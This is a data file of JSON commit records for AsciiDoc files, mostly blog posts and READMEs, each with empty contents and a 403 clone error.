{"commit":"4adb31b2264f51d419060b13ae48acad605341c0","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c262b72dffad20a86e0fbe1ea3102fae1de28c9d","subject":"Update 2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","message":"Update 2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","new_file":"_posts\/2016-11-29-Gabe-loses-his-Compasses-for-a-bit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"494511c37f7430edcb62a25a9287cb7d27ad1984","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-bus,spring-cloud\/spring-cloud-bus","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-bus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27a22605f7740bfff1b9cd43bc4b6f79baef5f8d","subject":"Update 2017-04-27-Meetup-Paris-Type-Script-9-Ionic.adoc","message":"Update 2017-04-27-Meetup-Paris-Type-Script-9-Ionic.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2017-04-27-Meetup-Paris-Type-Script-9-Ionic.adoc","new_file":"_posts\/2017-04-27-Meetup-Paris-Type-Script-9-Ionic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a454481e8768fc3edd2d561a690ff7216107230","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5bd79d28b54346c81ea6fd57c45c09adad75847","subject":"new 
release post","message":"new release post\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2017-08-16-release.adoc","new_file":"content\/news\/2017-08-16-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f16e0b1682b9ede751f1c80d42e26d5abfdba902","subject":"Update 2016-02-10-Bae.adoc","message":"Update 2016-02-10-Bae.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-02-10-Bae.adoc","new_file":"_posts\/2016-02-10-Bae.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fced0c245bcbffaffcd4f66b3bb224f214a4dc70","subject":"re blog post documentation","message":"re blog post documentation\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-11-Documentation.adoc","new_file":"_posts\/2017-08-11-Documentation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5d72a7abf4067f49f04ab4eccb306ef00f5a983","subject":"Update 2016-04-04-Desde-afuera.adoc","message":"Update 2016-04-04-Desde-afuera.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"985c288f21306237a810a27d35c41cf7158e68b5","subject":"Add release notes document for release 2.22.3","message":"Add release notes document for release 2.22.3\n\nSigned-off-by: Gregor Zurowski 
<5fdc67d2166bcdd1d3aa4ed45ea5a25e9b21bc20@zurowski.org>\n","repos":"Fabryprog\/camel,zregvart\/camel,davidkarlsen\/camel,pax95\/camel,nikhilvibhav\/camel,gnodet\/camel,tadayosi\/camel,tdiesler\/camel,ullgren\/camel,christophd\/camel,CodeSmell\/camel,davidkarlsen\/camel,objectiser\/camel,mcollovati\/camel,nicolaferraro\/camel,cunningt\/camel,apache\/camel,gnodet\/camel,tadayosi\/camel,tdiesler\/camel,DariusX\/camel,cunningt\/camel,christophd\/camel,DariusX\/camel,alvinkwekel\/camel,gnodet\/camel,nikhilvibhav\/camel,mcollovati\/camel,zregvart\/camel,ullgren\/camel,christophd\/camel,zregvart\/camel,cunningt\/camel,CodeSmell\/camel,adessaigne\/camel,zregvart\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,objectiser\/camel,pmoerenhout\/camel,objectiser\/camel,pax95\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,Fabryprog\/camel,CodeSmell\/camel,Fabryprog\/camel,pax95\/camel,tadayosi\/camel,apache\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,apache\/camel,adessaigne\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,christophd\/camel,tdiesler\/camel,adessaigne\/camel,davidkarlsen\/camel,Fabryprog\/camel,ullgren\/camel,apache\/camel,pmoerenhout\/camel,apache\/camel,tadayosi\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,pmoerenhout\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,DariusX\/camel,nicolaferraro\/camel,DariusX\/camel,gnodet\/camel,tdiesler\/camel,christophd\/camel,christophd\/camel,mcollovati\/camel,davidkarlsen\/camel,adessaigne\/camel,ullgren\/camel,alvinkwekel\/camel,gnodet\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,CodeSmell\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,tdiesler\/camel,objectiser\/camel,apache\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2223-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2223-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de747e50341f1142174cb621b6d7199286b730df","subject":"Add README","message":"Add README\n","repos":"myfear\/arquillian-example-cube-helloworld,aslakknutsen\/arquillian-example-cube-helloworld","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aslakknutsen\/arquillian-example-cube-helloworld.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5af92cd0e39a65bb74d6f1a15be2576797dad248","subject":"README file","message":"README 
file\n","repos":"mobile-geo\/leaflet-plugins,dtruel\/leaflet-plugins,Polyconseil\/leaflet-plugins,gam6itko\/leaflet-plugins,Skrupellos\/leaflet-plugins,socialpinpoint\/leaflet-plugins,opie\/leaflet-plugins,cschell\/leaflet-plugins,rouleur\/leaflet-plugins,azavea\/leaflet-plugins,dtruel\/leaflet-plugins,jblarsen\/leaflet-plugins,shramov\/leaflet-plugins,falcacibar\/leaflet-plugins,Polyconseil\/leaflet-plugins,jblarsen\/leaflet-plugins,azavea\/leaflet-plugins,savelevcorr\/leaflet-plugins,falcacibar\/leaflet-plugins,MasterHK\/leaflet-plugins,gam6itko\/leaflet-plugins,savelevcorr\/leaflet-plugins,nmlemus\/leaflet-plugins,gavioto\/leaflet-plugins,socialpinpoint\/leaflet-plugins,cschell\/leaflet-plugins,cschell\/leaflet-plugins,gavioto\/leaflet-plugins,falcacibar\/leaflet-plugins,rouleur\/leaflet-plugins,realtymaps\/leaflet-plugins,azavea\/leaflet-plugins,Skrupellos\/leaflet-plugins,mobile-geo\/leaflet-plugins,opie\/leaflet-plugins,realtymaps\/leaflet-plugins,nmlemus\/leaflet-plugins,dtruel\/leaflet-plugins,MasterHK\/leaflet-plugins,shramov\/leaflet-plugins","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/falcacibar\/leaflet-plugins.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39bc8c2bfbf4894f2fd411d1db62d31f3788d001","subject":"Update Readme","message":"Update Readme\n","repos":"sferik\/Nim,JCavallo\/Nim,nimLuckyBull\/Nim,tulayang\/Nim,xland\/Nim,judofyr\/Nim,BlaXpirit\/nre,zachaysan\/Nim,Senketsu\/Nim,jsanjuas\/Nim,zachaysan\/Nim,haiodo\/Nim,xland\/Nim,msmith491\/Nim,jsanjuas\/Nim,jfhg\/Nim,Dhertz\/Nim,reactormonk\/nim,fredericksilva\/Nim,nimLuckyBull\/Nim,Salafit\/Nim,fredericksilva\/Nim,Salafit\/Nim,xland\/Nim,JCavallo\/Nim,fredericksilva\/Nim,msmith491\/Nim,reactormonk\/nim,JCavallo\/Nim,nafsaka\/Nim,nimLuckyBull\/Nim,singularperturbation\/Nim,endragor\/Nim,jfhg\/Nim,singularperturbation\/Nim,xland\/Nim,judofyr\/Nim,Senketsu\/Nim,bvssvni\/Nim,reactormonk\/nim,bvssvni\/Nim,reactormonk\/nim,singularperturbation\/Nim,tmm1\/Nim,Dhertz\/Nim,fmamud\/Nim,dom96\/Nim,jfhg\/Nim,judofyr\/Nim,Salafit\/Nim,zachaysan\/Nim,dom96\/Nim,sarvex\/Nim-lang,Matt14916\/Nim,reactormonk\/nim,nanoant\/Nim,jsanjuas\/Nim,sarvex\/Nim-lang,douglas-larocca\/Nim,xland\/Nim,fmamud\/Nim,msmith491\/Nim,xland\/Nim,nafsaka\/Nim,Dhertz\/Nim,msmith491\/Nim,Salafit\/Nim,endragor\/Nim,jfhg\/Nim,tulayang\/Nim,Dhertz\/Nim,russpowers\/Nim,Matt14916\/Nim,mbaulch\/Nim,Senketsu\/Nim,nanoant\/Nim,Senketsu\/Nim,tmm1\/Nim,fredericksilva\/Nim,bvssvni\/Nim,Senketsu\/Nim,msmith491\/Nim,singularperturbation\/Nim,Senketsu\/Nim,tmm1\/Nim,nanoant\/Nim,judofyr\/Nim,reactormonk\/nim,mbaulch\/Nim,haiodo\/Nim,nimLuckyBull\/Nim,bvssvni\/Nim,fredericksilva\/Nim,jsanjuas\/Nim,douglas-larocca\/Nim,jsanjuas\/Nim,jfhg\/Nim,jsanjuas\/Nim,sferik\/Nim,mbaulch\/Nim,fmamud\/Nim,Matt14916\/Nim,sferik\/Nim,douglas-larocca\/Nim,dom96\/Nim,bvssvni\/Nim,Dhertz\/Nim,greyanubis\/Nim,zachaysan\/Nim,Matt14916\/Nim,Dhertz\/Nim,msmith491\/Nim,douglas-larocca\/Nim,endragor\/Nim,tmm1\/Nim,judofyr\/Nim,haiodo\/Nim,nafsaka\/Nim,Dhertz\/Nim,tmm1\/Nim,greyanubis\/Nim,russpowers\/Nim,nimLuckyBull\/Nim,nanoant\/Nim,russpowers\/Nim,nanoant\/Nim,Senketsu\/Nim,fmamud\/Nim,sarvex\/Nim-lang,fmamud\/Nim,msmith491\/Nim,nafsaka\/Nim,nanoant\/Nim,mbaulch\/Nim,fredericksilva\/Nim,russpowers\/Nim,douglas-larocca\/Nim,Matt14916\/Nim,sarvex\/Nim-lang,douglas-larocca\/Nim,haiodo\/Nim,russpowers\/Nim,haiodo\/Nim,JCavallo\/Nim,sa
rvex\/Nim-lang,jfhg\/Nim,singularperturbation\/Nim,bvssvni\/Nim,endragor\/Nim,nafsaka\/Nim,Salafit\/Nim,singularperturbation\/Nim,reactormonk\/nim,judofyr\/Nim,greyanubis\/Nim,russpowers\/Nim,nafsaka\/Nim,JCavallo\/Nim,Matt14916\/Nim,tulayang\/Nim,mbaulch\/Nim,judofyr\/Nim,fredericksilva\/Nim,sferik\/Nim,dom96\/Nim,jfhg\/Nim,sferik\/Nim,sarvex\/Nim-lang,bvssvni\/Nim,tulayang\/Nim,tulayang\/Nim,greyanubis\/Nim,sarvex\/Nim-lang,xland\/Nim,JCavallo\/Nim,nafsaka\/Nim,Salafit\/Nim,douglas-larocca\/Nim,fmamud\/Nim,russpowers\/Nim,judofyr\/Nim,dom96\/Nim,Matt14916\/Nim,zachaysan\/Nim,zachaysan\/Nim,endragor\/Nim,reactormonk\/nim,sferik\/Nim,endragor\/Nim,nanoant\/Nim,douglas-larocca\/Nim,greyanubis\/Nim,mbaulch\/Nim,BlaXpirit\/nre,tmm1\/Nim,sferik\/Nim,dom96\/Nim,fredericksilva\/Nim,zachaysan\/Nim,tulayang\/Nim,JCavallo\/Nim,flaviut\/nre,dom96\/Nim,endragor\/Nim,singularperturbation\/Nim,greyanubis\/Nim,fmamud\/Nim,tmm1\/Nim,nimLuckyBull\/Nim,sferik\/Nim,jsanjuas\/Nim,mbaulch\/Nim,Salafit\/Nim,haiodo\/Nim,haiodo\/Nim,nimLuckyBull\/Nim,greyanubis\/Nim","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tulayang\/Nim.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7f3059c72327c55f90dc479685556a1fc4e9bdb","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ea22eb57b7cedd7914d2b7e2f64d5c0b90802ac","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e00ddd1676945e57b09aea9cfa6b8d59e3269813","subject":"Update 2016-03-06-Purple-MagicBands-now-a-choice-in-MyMagic.adoc","message":"Update 2016-03-06-Purple-MagicBands-now-a-choice-in-MyMagic.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-06-Purple-MagicBands-now-a-choice-in-MyMagic.adoc","new_file":"_posts\/2016-03-06-Purple-MagicBands-now-a-choice-in-MyMagic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4856f88854b19a044001ecdf29ef9c33ec4234","subject":"y2b create post 5 Reasons Earphones Are Better Than Headphones","message":"y2b create post 5 Reasons Earphones Are Better Than Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-29-5-Reasons-Earphones-Are-Better-Than-Headphones.adoc","new_file":"_posts\/2016-04-29-5-Reasons-Earphones-Are-Better-Than-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7009326b6dc59176ee45c091b525fc171fe16b84","subject":"Renamed '_posts\/2020-04-25-This-week-i-joined-Makerlog.adoc' to '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc'","message":"Renamed '_posts\/2020-04-25-This-week-i-joined-Makerlog.adoc' to '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc","new_file":"_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d57f4ac6f600b584284328009b070b70967497a9","subject":"Update 2017-09-19-making-a-custom-theme-for-hubpress.adoc","message":"Update 2017-09-19-making-a-custom-theme-for-hubpress.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-19-making-a-custom-theme-for-hubpress.adoc","new_file":"_posts\/2017-09-19-making-a-custom-theme-for-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c40a85064bafb0b36aa2052495ee4095af604dcd","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d40b5dc4ebd06db5683337496b52475c4e7f380","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of 
index.adoc\n","repos":"ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,sfat\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ryanjbaxter\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68bdd207c0605ff4c794d4f19a246ed56e8b54c8","subject":"Update 2017-01-18-Pancake-C-M-S-Improvements-Week-2.adoc","message":"Update 2017-01-18-Pancake-C-M-S-Improvements-Week-2.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-01-18-Pancake-C-M-S-Improvements-Week-2.adoc","new_file":"_posts\/2017-01-18-Pancake-C-M-S-Improvements-Week-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a24678871961793e8ab1ff41720938516056cb8d","subject":"y2b create post World's Coolest Taxi (E3 2014)","message":"y2b create post World's Coolest Taxi (E3 2014)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-11-Worlds-Coolest-Taxi-E3-2014.adoc","new_file":"_posts\/2014-06-11-Worlds-Coolest-Taxi-E3-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1591ff7bca31397a4583c3bf2ae4849b3c8db1a5","subject":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","message":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6c72987b70e647649ac2008e2f45a7faf2d222d","subject":"y2b create post An Unexpected Gift From YouTube","message":"y2b create post An Unexpected Gift From YouTube","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-19-An-Unexpected-Gift-From-YouTube.adoc","new_file":"_posts\/2016-04-19-An-Unexpected-Gift-From-YouTube.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"78871ffcb14b175a0a827d50cc15a80c855e7fe3","subject":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","message":"Update 2016-04-01-A-quien-le-interese-Semana-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_file":"_posts\/2016-04-01-A-quien-le-interese-Semana-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"343c158d22f6548f0612c0ffc6daf8d45bd571ca","subject":"y2b create post They Call It The PowerHouse...","message":"y2b create post They Call It The PowerHouse...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-04-They-Call-It-The-PowerHouse.adoc","new_file":"_posts\/2016-09-04-They-Call-It-The-PowerHouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7c4eae9258081d89a77e74f42839095c629571c","subject":"Update 2017-10-08-Enable-E-S-Node-using-Babel.adoc","message":"Update 2017-10-08-Enable-E-S-Node-using-Babel.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-08-Enable-E-S-Node-using-Babel.adoc","new_file":"_posts\/2017-10-08-Enable-E-S-Node-using-Babel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"876640cfef6cc0f13737b2538a2e857bc8d5b5b8","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1de10a6bd3522e248aa3f479c5bbbb0ba55998ff","subject":"Update 2015-11-01-Enlaces-Utiles-Deploy.adoc","message":"Update 2015-11-01-Enlaces-Utiles-Deploy.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Enlaces-Utiles-Deploy.adoc","new_file":"_posts\/2015-11-01-Enlaces-Utiles-Deploy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e4cf5afcc7f630246f63dfff17488f7728fab0c","subject":"Update 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Update 
2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"_posts\/2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4915cca94321fdcacf1d214c0b65a9e4b6ff2130","subject":"Update 2014-11-11-On-LET-a-brief-comparative-thesis.adoc","message":"Update 2014-11-11-On-LET-a-brief-comparative-thesis.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-11-11-On-LET-a-brief-comparative-thesis.adoc","new_file":"_posts\/2014-11-11-On-LET-a-brief-comparative-thesis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5905ad5a98b496679a1e28f748cf8fd33fbb0e2f","subject":"add doc about contributing to the project","message":"add doc about contributing to the project\n","repos":"spring-projects\/sts4,spring-projects\/sts4,spring-projects\/sts4,spring-projects\/sts4,spring-projects\/sts4,spring-projects\/sts4","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/sts4.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c425af11669b1f43a0eb0a1ac6d7410de85e41be","subject":"Documented academic_calendar and offer_year_calendar","message":"Documented academic_calendar and 